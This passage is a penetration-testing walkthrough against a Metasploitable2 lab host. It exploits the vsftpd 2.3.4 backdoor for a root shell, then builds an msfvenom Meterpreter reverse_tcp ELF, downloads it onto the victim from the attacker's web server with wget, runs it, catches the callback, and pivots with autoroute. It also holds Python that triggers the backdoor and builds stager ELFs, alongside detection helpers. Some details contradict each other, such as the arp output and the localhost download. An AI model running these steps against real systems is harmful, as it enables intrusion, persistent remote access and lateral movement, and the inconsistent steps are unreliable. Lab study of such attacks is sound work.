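def check_vsftpd_backdoor(host, port=21, timeout=5.0):
    """Active check: USER with ':)', then PASS, then see whether 6200 opens.
    Side effect on a trojaned server: the 6200 root-shell listener is spawned.
    Records whether 6200 was open before the probe so a hit is not misattributed."""
    result = {"host": host,
              "backdoor_port_open_before": _accepts(host, BACKDOOR_PORT, timeout)}
    with socket.create_connection((host, port), timeout=timeout) as ftp:
        result["banner"] = ftp.recv(1024).decode(errors="replace").strip()
        ftp.sendall(b"USER probe" + TRIGGER + b"\r\n")
        try:
            reply = ftp.recv(1024).decode(errors="replace").strip()
        except socket.timeout:
            reply = ""
        result["user_reply"] = reply
        if not reply.startswith("331"):
            # anything but 331 (e.g. 530) means the password path, and with it
            # the trigger, was never reached
            result["backdoor_spawned"] = False
            return result
        ftp.sendall(b"PASS probe\r\n")   # a trojaned server does not answer this
        # keep the control connection open while probing, as the module does
        result["backdoor_spawned"] = _accepts(host, BACKDOOR_PORT, timeout)
    return result


if __name__ == "__main__":
    print("log hits:", find_trigger_attempts(SAMPLE_FTP_LOG))
    if len(sys.argv) > 1:
        print(check_vsftpd_backdoor(sys.argv[1]))
```

    The active check deliberately stops at "does 6200 accept a connection" and never sends a command to the shell; for the lab target it would be run as python3 vsftpd_check.py 192.168.43.120. On the detection side, the same two-byte test applied to the USER argument in FTP or IDS logs is enough to spot trigger attempts, including the ones Metasploit makes with a random username.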



    Vulnerability analysis of VSFTPD 2.3.4 backdoor


    With the mechanism understood, let us load the matching module into Metasploit with use exploit/unix/ftp/vsftpd_234_backdoor and read the vulnerability details with the info command, as follows:



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ sudo msfconsole -q                                                                                                       
    This copy of metasploit-framework is more than two weeks old.
     Consider running 'msfupdate' to update to the latest version.
    msf6 > search vsftpd
    
    Matching Modules
    ================
    
       #  Name                                  Disclosure Date  Rank       Check  Description
       -  ----                                  ---------------  ----       -----  -----------
       0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution
    
    
    Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor
    
    msf6 > 
    msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
    [*] Using configured payload cmd/unix/interact
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > info 
    
           Name: VSFTPD v2.3.4 Backdoor Command Execution
         Module: exploit/unix/ftp/vsftpd_234_backdoor
       Platform: Unix
           Arch: cmd
     Privileged: Yes
        License: Metasploit Framework License (BSD)
           Rank: Excellent
      Disclosed: 2011-07-03
    
    Provided by:
      hdm 
      MC 
    
    Available targets:
      Id  Name
      --  ----
      0   Automatic
    
    Check supported:
      No
    
    Basic options:
      Name    Current Setting  Required  Description
      ----    ---------------  --------  -----------
      RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
      RPORT   21               yes       The target port (TCP)
    
    Payload information:
      Space: 2000
      Avoid: 0 characters
    
    Description:
      This module exploits a malicious backdoor that was added to the 
      VSFTPD download archive. This backdoor was introduced into the 
      vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 
      according to the most recent information available. This backdoor 
      was removed on July 3rd 2011.
    
    References:
      OSVDB (73573)
      http://pastebin.com/AetT9sS5
      http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
    
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
    




    Next we set RHOST and RPORT, list the compatible payloads with show payloads, select the payload, review the options and finally run the exploit.



    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
    
    Module options (exploit/unix/ftp/vsftpd_234_backdoor):
    
       Name    Current Setting  Required  Description
       ----    ---------------  --------  -----------
       RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT   21               yes       The target port (TCP)
    
    
    Payload options (cmd/unix/interact):
    
       Name  Current Setting  Required  Description
       ----  ---------------  --------  -----------
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic
    
    
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 192.168.43.120
    RHOST => 192.168.43.120
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RPORT 21
    RPORT => 21
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads
    
    Compatible Payloads
    ===================
    
       #  Name                       Disclosure Date  Rank    Check  Description
       -  ----                       ---------------  ----    -----  -----------
       0  payload/cmd/unix/interact                   normal  No     Unix Command, Interact with Established Connection
    
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload payload/cmd/unix/interact
    payload => cmd/unix/interact
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
    



    Once the exploit runs (below) we have a root shell and can do a great deal, but one problem remains: maintaining access. As soon as we exit the session it is destroyed, and we would have to run the exploit again to get back in or run another command.



    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > 
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
    
    [*] 192.168.43.120:21 - Banner: 220 (vsFTPd 2.3.4)
    [*] 192.168.43.120:21 - USER: 331 Please specify the password.
    [+] 192.168.43.120:21 - Backdoor service has been spawned, handling...
    [+] 192.168.43.120:21 - UID: uid=0(root) gid=0(root)
    [*] Found shell.
    [*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.43.120:6200) at 2021-07-10 00:21:53 +0530
    
    whoami
    root
    pwd
    /
    
    ls
    bin
    boot
    cdrom
    dev
    etc
    home
    initrd
    initrd.img
    lib
    lost+found
    media
    mnt
    nohup.out
    opt
    proc
    root
    sbin
    srv
    sys
    tmp
    usr
    var
    vmlinuz
    
    ls -la
    total 125
    drwxr-xr-x  21 root root  4096 May 20  2012 .
    drwxr-xr-x  21 root root  4096 May 20  2012 ..
    drwxr-xr-x   2 root root  4096 May 13  2012 bin
    drwxr-xr-x   4 root root  1024 May 13  2012 boot
    lrwxrwxrwx   1 root root    11 Apr 28  2010 cdrom -> media/cdrom
    drwxr-xr-x  14 root root 13500 Jul  9 13:48 dev
    drwxr-xr-x  94 root root  4096 Jul  9 14:41 etc
    drwxr-xr-x   7 root root  4096 Jun  2 05:32 home
    drwxr-xr-x   2 root root  4096 Mar 16  2010 initrd
    lrwxrwxrwx   1 root root    32 Apr 28  2010 initrd.img -> boot/initrd.img-2.6.24-16-server
    drwxr-xr-x  13 root root  4096 May 13  2012 lib
    drwx------   2 root root 16384 Mar 16  2010 lost+found
    drwxr-xr-x   4 root root  4096 Mar 16  2010 media
    drwxr-xr-x   3 root root  4096 Apr 28  2010 mnt
    -rw-------   1 root root 41871 Jul  9 13:49 nohup.out
    drwxr-xr-x   2 root root  4096 Mar 16  2010 opt
    dr-xr-xr-x 118 root root     0 Jul  9 13:48 proc
    drwxr-xr-x  13 root root  4096 Jul  9 13:49 root
    drwxr-xr-x   2 root root  4096 May 13  2012 sbin
    drwxr-xr-x   2 root root  4096 Mar 16  2010 srv
    drwxr-xr-x  12 root root     0 Jul  9 13:48 sys
    drwxrwxrwt   4 root root  4096 Jul  9 14:07 tmp
    drwxr-xr-x  12 root root  4096 Apr 28  2010 usr
    drwxr-xr-x  14 root root  4096 Mar 17  2010 var
    lrwxrwxrwx   1 root root    29 Apr 28  2010 vmlinuz -> boot/vmlinuz-2.6.24-16-server
    
    



    Post Exploitation

    Now that we understand the vulnerability and have had access once, let us exploit it again, this time with the goal of keeping a persistent foothold on the target. First let us see which options need to be set before firing the exploit, using the show options command, as shown below.




    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
    
    Module options (exploit/unix/ftp/vsftpd_234_backdoor):
    
       Name    Current Setting  Required  Description
       ----    ---------------  --------  -----------
       RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT   21               yes       The target port (TCP)
    
    
    Payload options (cmd/unix/interact):
    
       Name  Current Setting  Required  Description
       ----  ---------------  --------  -----------
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic
    
    
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 192.168.43.120
    RHOST => 192.168.43.120
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RPORT 21
    RPORT => 21
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads
    
    Compatible Payloads
    ===================
    
       #  Name                       Disclosure Date  Rank    Check  Description
       -  ----                       ---------------  ----    -----  -----------
       0  payload/cmd/unix/interact                   normal  No     Unix Command, Interact with Established Connection
    
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload payload/cmd/unix/interact
    payload => cmd/unix/interact
    
    




    We can see that the module has only two options, RHOSTS and RPORT. We set RHOSTS (Metasploit also accepts set RHOST, as the transcript shows) to the IP address of the target and RPORT to 21, the port of the vulnerable FTP server.


    Next we can check for matching payloads with the show payloads command to see which payloads are suitable for this exploit module. There is only a single payload, payload/cmd/unix/interact, which we select with the set payload cmd/unix/interact command.




    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload payload/cmd/unix/interact
    payload => cmd/unix/interact
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > 
    msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
    
    [*] 192.168.43.120:21 - Banner: 220 (vsFTPd 2.3.4)
    [*] 192.168.43.120:21 - USER: 331 Please specify the password.
    [+] 192.168.43.120:21 - Backdoor service has been spawned, handling...
    [+] 192.168.43.120:21 - UID: uid=0(root) gid=0(root)
    [*] Found shell.
    [*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.43.120:6200) at 2021-07-10 00:21:53 +0530
    
    whoami
    root
    pwd
    /
    



    Voila! We have root access to the target system. So, what's next? Since we only have a plain command shell, let us try to gain better control over the target by spawning a Meterpreter session.


    To maintain access and obtain a Meterpreter shell, we need to create a reverse-connecting payload (one that calls back to our machine), upload it to the target system and execute it there. So let's get started.

     

    sudo msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.43.152 LPORT=4444 -f elf > backdoor.elf

    192.168.43.152 is our own (attacker) IP address, and 4444 is the port our handler will listen on.




    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ ls
    ip.txt  livehosts.txt  osdetails.txt  vapt-report.txt  vuln.txt
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ sudo msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.43.152 LPORT=4444 -f elf > backdoor.elf                 
    [sudo] password for hackerboy: 
    [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
    [-] No arch selected, selecting arch: x86 from the payload
    No encoder specified, outputting raw payload
    Payload size: 123 bytes
    Final size of elf file: 207 bytes
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ ls                             
    backdoor.elf  ip.txt  livehosts.txt  osdetails.txt  vapt-report.txt  vuln.txt
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ 
    
    



    We use the msfvenom utility to generate a Meterpreter payload, as shown above. The -p switch selects the payload; LHOST and LPORT are our IP address and the port that backdoor.elf will connect back to in order to give us Meterpreter access to the target. The -f switch selects the output format: elf is the native executable format on Linux, so the resulting 207-byte file (123 bytes of payload plus the ELF wrapper) can be run directly on the target.
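    As an added example (not code from the original write-up or from Metasploit), the Python below reproduces the minimal ELF wrapper that msfvenom -f elf places around a raw payload, which is where the 84-byte difference between "Payload size: 123 bytes" and "Final size of elf file: 207 bytes" comes from, and then does the reverse job an incident responder needs: parse a dropped backdoor.elf and recover the LHOST/LPORT the linux/x86 reverse_tcp stager calls home to. The template constants and the instruction pattern keyed on are assumptions about the msfvenom output; the sample stager bytes are constructed, not the real 123-byte payload.

```python
"""Minimal ELF wrapper as used by `msfvenom -f elf`, plus recovery of the
callback address from a linux/x86 reverse_tcp stager. Added example, not
from the original write-up or from Metasploit; template constants assumed."""
import re
import socket
import struct
import sys

ELF_BASE = 0x08048000            # load address of the msfvenom ELF template (assumed)
EHDR_SIZE, PHDR_SIZE = 52, 32    # sizeof(Elf32_Ehdr), sizeof(Elf32_Phdr)


def build_msfvenom_style_elf(payload: bytes) -> bytes:
    """ELF header + one PT_LOAD program header + raw payload: 84 bytes of
    wrapper, which is why a 123-byte payload became a 207-byte file."""
    total = EHDR_SIZE + PHDR_SIZE + len(payload)
    e_ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8  # ELFCLASS32, LSB, v1, SYSV
    ehdr = e_ident + struct.pack(
        "<HHIIIIIHHHHHH",
        2, 3, 1,                            # ET_EXEC, EM_386, EV_CURRENT
        ELF_BASE + EHDR_SIZE + PHDR_SIZE,   # e_entry: first payload byte
        EHDR_SIZE, 0, 0,                    # e_phoff, e_shoff, e_flags
        EHDR_SIZE, PHDR_SIZE, 1,            # e_ehsize, e_phentsize, e_phnum
        0, 0, 0)                            # no section headers at all
    phdr = struct.pack(
        "<IIIIIIII",
        1, 0,                   # PT_LOAD, p_offset 0: map the whole file
        ELF_BASE, ELF_BASE,     # p_vaddr, p_paddr
        total, total,           # p_filesz, p_memsz
        7, 0x1000)              # PF_R|PF_W|PF_X, p_align
    return ehdr + phdr + payload


def extract_payload(elf: bytes) -> bytes:
    """Validate a 32-bit x86 ELF and return the bytes from the entry point to
    the end of the PT_LOAD segment that contains it."""
    if elf[:4] != b"\x7fELF" or elf[4] != 1 or elf[5] != 1:
        raise ValueError("not a 32-bit little-endian ELF")
    _, e_machine, _, e_entry, e_phoff = struct.unpack_from("<HHIII", elf, 16)
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 42)
    if e_machine != 3:
        raise ValueError("not an x86 ELF (e_machine=%d)" % e_machine)
    for n in range(e_phnum):
        p_type, p_offset, p_vaddr, _, p_filesz = struct.unpack_from(
            "<IIIII", elf, e_phoff + n * e_phentsize)
        if p_type == 1 and p_vaddr <= e_entry < p_vaddr + p_filesz:
            start = p_offset + (e_entry - p_vaddr)
            return elf[start:p_offset + p_filesz]
    raise ValueError("entry point is not inside any PT_LOAD segment")


# The linux/x86 reverse_tcp stager builds sockaddr_in on the stack as
#   push <LHOST, 4 bytes>             68 xx xx xx xx
#   push AF_INET | htons(LPORT)<<16    68 02 00 pp pp   (port bytes in network order)
STAGER_SOCKADDR = re.compile(rb"\x68(?P<ip>.{4})\x68\x02\x00(?P<port>.{2})", re.DOTALL)


def extract_reverse_tcp_callback(payload: bytes):
    """Return (LHOST, LPORT) recovered from the stager immediates, or None."""
    m = STAGER_SOCKADDR.search(payload)
    if not m:
        return None
    return socket.inet_ntoa(m.group("ip")), struct.unpack(">H", m.group("port"))[0]


# Constructed stand-in for the stager (not the real 123-byte output): the
# socket() call, the two sockaddr pushes for 192.168.43.152:4444, connect().
SAMPLE_STAGER = (
    b"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\xb0\x66\x89\xe1\xcd\x80\x97\x5b"
    b"\x68\xc0\xa8\x2b\x98"           # push 0x982ba8c0 -> 192.168.43.152
    b"\x68\x02\x00\x11\x5c"           # push 0x5c110002 -> AF_INET, port 4444
    b"\x89\xe1\x6a\x66\x58\x50\x51\x57\x89\xe1\x43\xcd\x80"
)


def analyse(path: str):
    """Report size and callback of a dropped msfvenom ELF such as backdoor.elf."""
    with open(path, "rb") as fh:
        blob = fh.read()
    payload = extract_payload(blob)
    return {"file_size": len(blob), "payload_size": len(payload),
            "callback": extract_reverse_tcp_callback(payload)}


if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(analyse(sys.argv[1]))
    else:
        sample = build_msfvenom_style_elf(SAMPLE_STAGER)
        print(len(sample), "bytes,", extract_reverse_tcp_callback(extract_payload(sample)))
```

    Run as python3 elfcheck.py backdoor.elf against the file generated above; on a real msfvenom stager the callback field should read the LHOST and LPORT that were passed on the command line, which is also how a responder who finds such a file on a compromised host learns where it was going to connect. Because the callback address sits in the stager as plain immediates, an encoder would be needed to hide it, which is one reason the unencoded 207-byte file is trivial to fingerprint.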

     

    So what happens next? Do we walk over to the victim's machine and run the file by hand? No. We keep the shell obtained through the vsftpd exploit and, with an Apache server running on our own system, transfer the payload to the victim from that shell.

     

    If the victim is on another network, away from us, we could instead rent and host a server for this purpose and download the file onto the target machine from there.



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ sudo service apache2 start                                                                              
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ sudo mv backdoor.elf /var/www/html/                                                                                      
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ 
    



    We run the apache service via the service apache2 start command and move the backdoor file into the default document root directory of the Apache server. Let us now download the file from our Apache server onto the victim system.


    whoami
    root
    pwd
    /
    
    
    wget http://192.168.43.152/backdoor.elf       
    --16:06:29--  http://192.168.43.152/backdoor.elf
               => `backdoor.elf'
    Connecting to 192.168.43.152:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 207
    
        0K                                                       100%    7.65 MB/s
    
    16:06:29 (7.65 MB/s) - `backdoor.elf' saved [207/207]
    
    
    


    We can download the file via the wget command, as shown in the preceding screenshot. Now, in order to allow the victim system to communicate with Metasploit, we need to set up an exploit handler on our system. The handler will allow communication between the target and Metasploit using the same port and payload we used in the backdoor.elf file.



    OR (a second method to get the backdoor file onto our victim machine)

     

    We can also serve the backdoor to our victim's machine with Python's http.server, like this:


     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[/var/www/html/backdoor]
    └─$ python3 -m http.server 1234
    Serving HTTP on 0.0.0.0 port 1234 (http://0.0.0.0:1234/) ...
    192.168.43.120 - - [10/Jul/2021 01:36:03] "GET /backdoor.elf HTTP/1.0" 200 - 
     
     

     

    and then, on the victim's machine, we fetch the backdoor file with the wget command:



    whoami
    root
    pwd
    /
    
    wget http://127.0.0.1/backdoor.elf
    
    --2021-07-10 00:47:02--  http://127.0.0.1/backdoor.elf
    Connecting to 127.0.0.1:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 207
    Saving to: ‘backdoor.elf’
    
    backdoor.elf                      100%[===========================================================>]     207  --.-KB/s    in 0s      
    
    2021-07-10 00:47:02 (23.1 MB/s) - ‘backdoor.elf’ saved [207/207]
    
    




    We issue use exploit/multi/handler on a separate terminal in Metasploit and set the payload type as linux/x86/meterpreter/reverse_tcp. Next, we set the listening port via set LPORT 4444 and LHOST as our local IP address. We can now run the module using the exploit command and wait for the incoming connections.



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ sudo msfconsole -q
    This copy of metasploit-framework is more than two weeks old.
     Consider running 'msfupdate' to update to the latest version.
    msf6 > use exploit/multi/handler
    [*] Using configured payload linux/x86/meterpreter/reverse_tcp
    msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
    payload => linux/x86/meterpreter/reverse_tcp
    msf6 exploit(multi/handler) > set LPORT 4444
    LPORT => 4444
    msf6 exploit(multi/handler) > set LHOST 192.168.43.152
    LHOST => 192.168.43.152
    msf6 exploit(multi/handler) > exploit
    
    [*] Started reverse TCP handler on 192.168.43.152:4444 
    ^C[-] Exploit failed [user-interrupt]: Interrupt 
    [-] exploit: Interrupted
    msf6 exploit(multi/handler) > exploit
    
    [*] Started reverse TCP handler...
    
    
    
    

    Once the file has been downloaded onto the target, we give it the necessary permissions via the chmod command, as shown in the following screenshot:



    chmod 777 backdoor.elf
    
    
    
    
    ls -la
    total 129
    drwxr-xr-x  21 root root  4096 Jul  9 16:18 .
    drwxr-xr-x  21 root root  4096 Jul  9 16:18 ..
    -rwxrwxrwx   1 root root   207 Jul  9 16:17 backdoor.elf
    drwxr-xr-x   2 root root  4096 May 13  2012 bin
    drwxr-xr-x   4 root root  1024 May 13  2012 boot
    lrwxrwxrwx   1 root root    11 Apr 28  2010 cdrom -> media/cdrom
    drwxr-xr-x  14 root root 13500 Jul  9 15:53 dev
    drwxr-xr-x  94 root root  4096 Jul  9 16:19 etc
    drwxr-xr-x   7 root root  4096 Jun  2 05:32 home
    ....
    
    
    ./backdoor.elf 
    
    


    Providing the 777 permission grants read, write, and execute permissions to everyone on the file (only the execute bit is actually needed to run it; 777 also makes the file world-writable, which is what the -rwxrwxrwx entry above shows). Execute the file, and now switch to the other terminal, which is running our exploit handler:
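The tiny ELF that msfvenom produced (207 bytes) and the chmod 777 on it are both things a host-based hunt can look for. The following Python is an added example, not code from the original post: it walks a directory tree, flags world-writable executables and section-header-less ELF32 files, and builds a constructed, inert fixture to run against (the 4096-byte "tiny" threshold is an assumption).

```python
import os
import stat
import struct
import tempfile

ELF_MAGIC = b"\x7fELF"

def parse_elf_header(data):
    """Header fields that matter for triage, or None if not a 32-bit ELF header (64-bit has another layout)."""
    if len(data) < 52 or data[:4] != ELF_MAGIC or data[4] != 1:
        return None
    endian = "<" if data[5] == 1 else ">"
    f = struct.unpack_from(endian + "HHIIIIIHHHHHH", data, 16)
    return {"type": f[0], "machine": f[1], "entry": f[3], "phnum": f[9], "shnum": f[11]}

def triage_file(path, max_size=4096):
    """Reasons a file looks like a dropped stager, or None when nothing stands out."""
    st = os.lstat(path)
    if not stat.S_ISREG(st.st_mode):
        return None
    reasons = []
    if st.st_mode & stat.S_IWOTH and st.st_mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
        reasons.append("world-writable executable")                  # the chmod 777 pattern
    with open(path, "rb") as fh:
        hdr = parse_elf_header(fh.read(52))
    if hdr and hdr["type"] == 2:                                      # ET_EXEC
        if hdr["shnum"] == 0:
            reasons.append("ELF executable with no section headers")  # typical of generated stagers
        if st.st_size <= max_size:
            reasons.append("tiny ELF executable (%d bytes)" % st.st_size)
    return reasons or None

def find_suspicious_executables(root):
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if reasons := triage_file(path):
                hits[path] = reasons
    return hits

def build_sample_tree():
    """Constructed fixture: an inert 207-byte ELF32 stub shaped like the page's payload
    (52-byte header, one PT_LOAD program header, 123 NOP bytes), chmod 777, beside a benign file."""
    root = tempfile.mkdtemp()
    ident = ELF_MAGIC + bytes([1, 1, 1]) + bytes(9)  # 32-bit, little-endian, version 1
    ehdr = struct.pack("<HHIIIIIHHHHHH", 2, 3, 1, 0x8048054, 52, 0, 0, 52, 32, 1, 0, 0, 0)
    phdr = struct.pack("<IIIIIIII", 1, 0, 0x8048000, 0x8048000, 207, 207, 7, 0x1000)
    stub = os.path.join(root, "backdoor.elf")
    with open(stub, "wb") as fh:
        fh.write(ident + ehdr + phdr + b"\x90" * 123)
    os.chmod(stub, 0o777)
    with open(os.path.join(root, "notes.txt"), "w") as fh:
        fh.write("nothing to see here\n")
    return root
```

Run find_suspicious_executables(build_sample_tree()) to see the stub flagged for all three reasons while notes.txt is ignored.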



    msf6 exploit(multi/handler) > exploit
    
    [*] Started reverse TCP handler on 192.168.43.152:4444 
    ^C[-] Exploit failed [user-interrupt]: Interrupt 
    [-] exploit: Interrupted
    msf6 exploit(multi/handler) > exploit
    
    [*] Started reverse TCP handler on 192.168.43.152:4444 
    [*] Sending stage (984904 bytes) to 192.168.43.120
    [*] Meterpreter session 1 opened (192.168.43.152:4444 -> 192.168.43.120:60290) at 2021-07-10 02:49:15 +0530
    
    meterpreter > 
    
    



    Mumma, we got it! We now have meterpreter shell access to the target. Let's find some interesting information using the post-exploitation modules:
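From the defender's side, the two artifacts shown above (the GET /backdoor.elf line in the web-server log and the connection from the same host back to the handler on port 4444) can be correlated into one alert. The following Python is an added example, not code from the original post; the access-log lines and flow records are constructed, and the five-minute pairing window is an assumed tuning value.

```python
import re
from datetime import datetime, timedelta

# Constructed sample in the format Python's http.server prints (the first line mirrors the page's log)
ACCESS_LOG = """\
192.168.43.120 - - [10/Jul/2021 01:36:03] "GET /backdoor.elf HTTP/1.0" 200 -
192.168.43.77 - - [10/Jul/2021 01:36:10] "GET /index.html HTTP/1.1" 200 -
192.168.43.77 - - [10/Jul/2021 01:36:11] "GET /setup.sh HTTP/1.1" 404 -
"""
# Constructed flow records (timestamp, src, dst, dport) as an egress sensor might log them
FLOWS = [
    ("10/Jul/2021 01:36:03", "192.168.43.120", "192.168.43.152", 80),    # the download itself
    ("10/Jul/2021 01:36:05", "192.168.43.120", "192.168.43.152", 4444),  # callback to the handler
    ("10/Jul/2021 01:36:12", "192.168.43.77", "192.168.43.152", 80),
]
LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
EXEC_EXT = (".elf", ".bin", ".sh", ".exe")
WEB_PORTS = {80, 443, 8080}

def parse_ts(text):
    return datetime.strptime(text, "%d/%b/%Y %H:%M:%S")   # http.server's timestamp layout

def executable_downloads(log_text):
    """Successful fetches of executable-looking files: (time, client, path)."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and m["status"] == "200" and m["path"].lower().endswith(EXEC_EXT):
            hits.append((parse_ts(m["ts"]), m["client"], m["path"]))
    return hits

def stage_and_callback(log_text, flows, window=timedelta(minutes=5)):
    """Pair each executable download with a later non-web outbound connection from the same host."""
    alerts = []
    for when, client, path in executable_downloads(log_text):
        for ts, src, dst, dport in flows:
            t = parse_ts(ts)
            if src == client and dport not in WEB_PORTS and when <= t <= when + window:
                alerts.append({"host": client, "file": path, "callback": f"{dst}:{dport}",
                               "delay_s": int((t - when).total_seconds())})
    return alerts
```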




    meterpreter > sysinfo
    Computer     : metasploitable.localdomain
    OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)
    Architecture : i686
    BuildTuple   : i486-linux-musl
    Meterpreter  : x86/linux
    meterpreter > 
    meterpreter > ifconfig
    
    



    Running the sysinfo command, we can see that the target is metasploitable (an intentionally vulnerable operating system), its architecture is i686, and the kernel version is 2.6.24-16.



    meterpreter > 
    meterpreter > ifconfig
    
    Interface  1
    ============
    Name         : lo
    Hardware MAC : 00:00:00:00:00:00
    MTU          : 16436
    Flags        : UP,LOOPBACK
    IPv4 Address : 127.0.0.1
    IPv4 Netmask : 255.0.0.0
    IPv6 Address : ::1
    IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::
    
    
    Interface  2
    ============
    Name         : eth0
    Hardware MAC : 08:00:27:67:67:30
    MTU          : 1500
    Flags        : UP,BROADCAST,MULTICAST
    IPv4 Address : 192.168.43.120
    IPv4 Netmask : 255.255.255.0
    IPv6 Address : 2409:4064:228d:76cd:a00:27ff:fe67:6730
    IPv6 Netmask : ffff:ffff:ffff:ffff::
    IPv6 Address : fe80::a00:27ff:fe67:6730
    IPv6 Netmask : ffff:ffff:ffff:ffff::
    
    meterpreter > 
    



    Running the ifconfig command on the target, we see some interesting information, such as any additional network interfaces, which may lead us to an internal network on which other internal systems reside. We then run the arp command on the target to check whether systems from the internal network are, or recently were, connected to the exploited system, as shown in the following screenshot:



    meterpreter > arp
    
    ARP cache
    =========
    
        IP address      MAC address        Interface
        ----------      -----------        ---------
        192.168.43.152  fc:01:7c:29:00:77
    
    meterpreter > 
    
    
    
    

    We can clearly see an additional system with IP address 192.168.43.120 on the internal network. To reach the internal network, we need to set up pivoting through the exploited machine using the autoroute command.



    meterpreter > run autoroute -p
    
    [*] No routes have been added yet 
    meterpreter > 
    
    
    
    meterpreter > run autoroute -s 192.168.43.120 255.255.255.0
    
    [*] Adding a route to 192.168.43.120/255.255.255.0...
    [+] Added route to 192.168.43.120/255.255.255.0 via 192.168.43.120 
    [*] Use the -p option to list all active routes
    
    meterpreter > run autoroute -p
    
    Active Routing Table
    ====================
    
       Subnet            Netmask         Gateway
       ------            -------         -------
       192.168.43.120    255.255.255.0   Session 1 
    
    meterpreter > 
    
    
    


    The autoroute -p command prints all the routing information on a session. We can see we do not have any routes by default. Let us add a route to the target internal network using the autoroute -s 192.168.43.120 255.255.255.0 command. Issuing this command, we can see that the route got successfully added to the routing table, and now all the communication from Metasploit will pass through our meterpreter session to the internal network.
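To see how the route entry above steers traffic, here is an added example (not Metasploit's own code) modelling the lookup: a destination goes through the session whose installed subnet matches it most specifically, otherwise it goes out directly. The first row is the page's route; the other rows and the most-specific-match assumption are mine.

```python
import ipaddress

# Constructed table in the shape autoroute -p prints: (subnet, netmask, gateway).
# Row one is the page's route; the rest are made up to show overlapping entries.
ROUTES = [
    ("192.168.43.120", "255.255.255.0", "Session 1"),
    ("10.10.0.0",      "255.255.0.0",   "Session 2"),
    ("10.10.5.0",      "255.255.255.0", "Session 3"),
]

def effective_network(subnet, netmask):
    """autoroute accepts a host address plus netmask; the route it installs is the containing network."""
    return ipaddress.ip_network(f"{subnet}/{netmask}", strict=False)

def resolve(routes, destination, default="direct"):
    """Session a connection to destination would be relayed through (most specific match wins)."""
    dst = ipaddress.ip_address(destination)
    best = None
    for subnet, netmask, gateway in routes:
        net = effective_network(subnet, netmask)
        if dst in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, gateway)
    return best[1] if best else default

def routing_table(routes):
    """The table with normalized subnets, which is what to check after adding a route."""
    return [(str(effective_network(s, m)), g) for s, m, g in routes]
```

Note that 192.168.43.120 with mask 255.255.255.0 normalizes to 192.168.43.0/24, so the installed route covers the whole /24 the session itself lives on.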

    Let us now put the meterpreter session in the background by using the background command as follows:



    meterpreter > background 
    [*] Backgrounding session 1...
